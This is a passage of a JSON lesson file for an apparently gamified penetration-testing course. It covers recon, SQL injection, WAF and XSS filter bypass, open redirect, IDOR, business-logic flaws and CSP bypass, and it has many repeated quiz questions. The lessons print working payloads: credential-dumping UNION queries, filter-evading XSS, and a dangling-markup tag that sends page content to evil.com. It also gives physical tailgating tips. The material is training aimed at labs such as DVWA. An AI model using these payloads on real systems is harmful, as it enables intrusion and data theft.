packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-physical-recon","cat":"Reconnaissance","title":"Physical Security Reconnaissance","diff":3,"xp":200,"intro":"Gather intelligence about physical security controls.","sections":[{"type":"text","content":"Drive-by observation, satellite imagery, social media photos of the office, badge types, entry points, guard schedules, and visitor policies."},{"type":"code","lang":"bash","content":"# Google Earth/Maps for satellite imagery\n# Social media for office photos (badge types visible?)\n# LinkedIn for employee roles in physical security\n# Observe: entry points, cameras, guard rotations\n# Tailgating opportunities: smoking areas, delivery docks"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Physical recon reveals...","opts":["Network topology","Entry points, camera positions, and security procedures","Database schemas","Firewall rules"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"w-sql-union","cat":"Web Application","title":"SQLi UNION Attack","diff":1,"xp":100,"intro":"Extract data from other tables with UNION SELECT.","sections":[{"type":"text","content":"UNION-based SQLi appends your query results to the original. You must match the column count and find displayable columns."},{"type":"code","lang":"bash","content":"?id=1 ORDER BY 5--  # find column count\n?id=1 UNION SELECT 1,2,3,4,5--  # find displayed columns\n?id=1 UNION SELECT 1,username,password,4,5 FROM users--"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"UNION attacks require matching...","opts":["Data types","The number of columns in the original query","Table names","Database version"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-sqli-waf-bypass","cat":"Web Application","title":"SQLi WAF Bypass","diff":4,"xp":250,"intro":"Bypass WAF filters blocking SQL keywords.","sections":[{"type":"text","content":"Inline comments, case mixing, encoding, and alternative syntax evade WAF signature matching."},{"type":"code","lang":"bash","content":"# Comment bypass\n1'/**/UNION/**/SELECT/**/1,2,3--\n# Case mixing\n1' uNiOn SeLeCt 1,2,3--\n# Hex encoding\n1' UNION SELECT 0x61646d696e--\n# Double URL encoding\n1%2527 UNION SELECT 1,2,3--"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"WAF SQLi bypass uses...","opts":["Stronger encryption","Comments, encoding, and case variation","Different ports","VPN"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-xss-filter-bypass","cat":"Web Application","title":"XSS Filter Bypass","diff":3,"xp":200,"intro":"Bypass client-side and server-side XSS filters.","sections":[{"type":"text","content":"Filters blocking <script> can be bypassed with event handlers, uncommon tags, encoding, and DOM-based vectors."},{"type":"code","lang":"bash","content":"# Event handlers without script tags\n<img src=x onerror=alert(1)>\n<svg onload=alert(1)>\n<details open ontoggle=alert(1)>\n<body onpageshow=alert(1)>\n# Encoding\n<img src=x onerror=\\u0061lert(1)>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"XSS filters are bypassed with...","opts":["SQL injection","Alternative tags and event handlers","CSRF tokens","Encryption"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-open-redirect","cat":"Web Application","title":"Open Redirect Exploitation","diff":1,"xp":75,"intro":"Redirect users to malicious sites via trusted URLs.","sections":[{"type":"text","content":"If the app redirects to a user-supplied URL without validation, attackers craft convincing phishing URLs under the trusted domain."},{"type":"code","lang":"bash","content":"https://target.com/redirect?url=https://evil.com\nhttps://target.com/redirect?url=//evil.com\nhttps://target.com/redirect?next=https://evil.com/phishing"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Open redirects are dangerous because...","opts":["They crash servers","The phishing URL appears to come from the trusted domain","They encrypt traffic","They modify DNS"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-idor-advanced","cat":"Web Application","title":"Advanced IDOR Techniques","diff":3,"xp":200,"intro":"Beyond simple ID increment \u2014 UUIDs, hashed IDs, encoded references.","sections":[{"type":"text","content":"IDOR isn't always sequential numbers. Test: UUID brute-force from leaked endpoints, parameter tampering in JSON bodies, and reference manipulation in file paths."},{"type":"code","lang":"bash","content":"# JSON body IDOR\nPOST /api/orders\n{\"orderId\":\"uuid-of-another-user\"}\n# Path IDOR\nGET /api/users/me/documents -> /api/users/OTHER/documents\n# Encoded IDOR\n# id=base64(123) -> try base64(124)\necho -n '124' | base64"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Advanced IDOR tests...","opts":["Only sequential numbers","UUIDs, encoded references, and path parameters","Only cookies","Only headers"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-business-logic","cat":"Web Application","title":"Business Logic Vulnerabilities","diff":3,"xp":200,"intro":"Exploit flawed application logic that code review alone misses.","sections":[{"type":"text","content":"Business logic bugs: negative quantity in cart (get money back), skipping payment step, applying coupons multiple times, race conditions in transfers."},{"type":"code","lang":"bash","content":"# Negative price/quantity\nPOST /cart/add\n{\"item\":\"premium\",\"quantity\":-1,\"price\":99.99}\n# Skip payment step (go directly to order confirmation)\n# Apply coupon after payment\n# Transfer to self (double credit)"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Business logic bugs are found by...","opts":["Automated scanning","Understanding the intended workflow and testing deviations","Port scanning","DNS enumeration"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-csp-bypass","cat":"Web Application","title":"Content Security Policy Bypass","diff":4,"xp":250,"intro":"Bypass CSP restrictions to achieve XSS.","sections":[{"type":"text","content":"CSP can be bypassed via: JSONP endpoints on whitelisted domains, base-uri injection, script-src 'unsafe-inline', trusted CDN gadgets, and policy misconfigurations."},{"type":"code","lang":"bash","content":"# JSONP bypass (if *.google.com is whitelisted)\n<script src='https://accounts.google.com/o/oauth2/revoke?callback=alert(1)'></script>\n# base-uri injection\n<base href='https://evil.com/'>\n# Dangling markup injection\n<img src='https://evil.com/?"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your 